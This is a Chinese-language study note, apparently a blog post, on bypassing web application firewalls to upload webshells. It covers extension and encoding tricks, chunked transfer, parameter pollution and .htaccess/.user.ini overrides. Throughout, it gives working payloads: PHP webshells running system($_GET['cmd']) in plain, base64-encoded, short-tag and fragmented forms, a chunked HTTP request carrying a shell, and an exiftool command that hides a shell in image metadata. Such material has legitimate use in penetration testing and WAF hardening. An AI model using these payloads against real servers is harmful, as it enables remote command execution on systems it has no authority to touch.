文件上传漏洞绕过WAF

文件上传漏洞绕过WAF学习笔记


1. WAF检测原理

WAF(Web应用防火墙)通过以下方式拦截文件上传攻击:

  1. 关键字匹配 :检测文件名、内容中的敏感词(如<?phpeval)。

  2. 扩展名黑名单 :拦截.php.jsp等危险扩展名。

  3. 文件头验证 :检查文件魔数(如FFD8FF对应JPEG)。

  4. 流量特征分析:检测异常请求结构(如超长文件名、畸形HTTP包)。


2. 通用绕过技术

2.1 解析差异利用

  • 大小写混合sHell.PhP.Php(部分WAF未统一大小写)。

  • 特殊字符插入

    • 分号截断(IIS):shell.asp;.jpg → 解析为.asp

    • 换行符插入:filename="shell.p\nhp"(绕过正则匹配)。

  • 扩展名混淆

    • 多重扩展名:shell.php.jpg → 结合解析漏洞(如Apache解析最后有效扩展名)。

    • 非标准扩展名:.php7.phtml.phar(需环境支持)。


2.2 编码混淆

  • URL编码

    • shell.%70hp%70=p)→ 部分WAF不解码检测。
  • Unicode编码

    • shell.\u0070hp → 转换为shell.php
  • HTML实体编码

    • 文件名:shell.#112;hp#112;=p)。
  • Base64/Hex编码文件内容

    php

    复制代码
    <?= eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>  

2.3 分块传输(Chunked Encoding)

  • 绕过原理:WAF可能不解析分块传输的文件内容。

  • 示例

    http

    复制代码
    POST /upload HTTP/1.1  
    Transfer-Encoding: chunked  
    ​
    7\r\n  
    <?php \r\n  
    8\r\n  
    system($_GET['cmd']);\r\n  
    0\r\n  
  • 工具 :Burp Suite的Chunked Coding Converter插件。


2.4 文件内容绕过

  • 图片马注入

    • 在图片元数据中插入代码(Exif注释、IPTC字段)。

    bash

    复制代码
    exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg  
  • 短标签与动态调用

    php

    复制代码
    <?= `$_GET[0]`?>  # 短标签  
    <?php $_GET['a']($_GET['b']); ?>  # 动态函数调用  
  • 代码碎片化

    php

    复制代码
    <?php $a = "syste"; $b = "m"; $a.$b("id"); ?>  

2.5 HTTP协议特性利用

  • 参数污染

    http

    复制代码
    POST /upload?filename=shell.jpg HTTP/1.1  
    Content-Disposition: form-data; name="file"; filename="shell.php"  
    • 部分WAF优先取URL参数中的文件名。
  • 多文件上传绕过

    • 在多个文件字段中插入恶意文件,WAF可能只检测第一个。

3. 针对特定WAF的绕过

3.1 云WAF(如Cloudflare、阿里云)

  • 缓存污染攻击

    • 上传合法文件触发缓存,再覆盖为恶意文件。
  • IP轮询绕过

    • 通过大量不同IP上传,绕过频率限制。

3.2 ModSecurity规则绕过

  • 已知规则缺陷

    • 使用非常规扩展名:.php%20(空格)、.php.(末尾点)。

    • 利用正则回溯限制:构造超长文件名耗尽WAF计算资源。


4. 高级技巧

4.1 .htaccess/.user.ini覆盖

  • .htaccess(Apache)

    复制

    复制代码
    AddType application/x-httpd-php .jpg  
  • .user.ini(PHP)

    复制

    复制代码
    auto_prepend_file=shell.jpg  

4.2 分片上传绕过

  • 上传文件分片后合并,绕过WAF对完整文件的检测。

4.3 0day漏洞利用

  • CVE-2023-XXXX:特定WAF未修复的解析漏洞(需持续跟踪)。
相关推荐
virelin_Y.lin7 小时前
系统与网络安全------Windows系统安全(9)
windows·web安全·系统安全·iis
zhu128930355610 小时前
网络安全防护与挑战
网络·安全·web安全
神经毒素11 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
网络安全指导员15 小时前
如何在JMeter中配置断言,将非200状态码视为测试成功
网络·学习·jmeter·安全·web安全·架构
Sean_summer17 小时前
木马学习记录
web安全
ALe要立志成为web糕手2 天前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
zhu12893035562 天前
网络安全的现状与防护措施
网络·安全·web安全
zhu12893035562 天前
网络安全与防护策略
网络·安全·web安全
virelin_Y.lin2 天前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全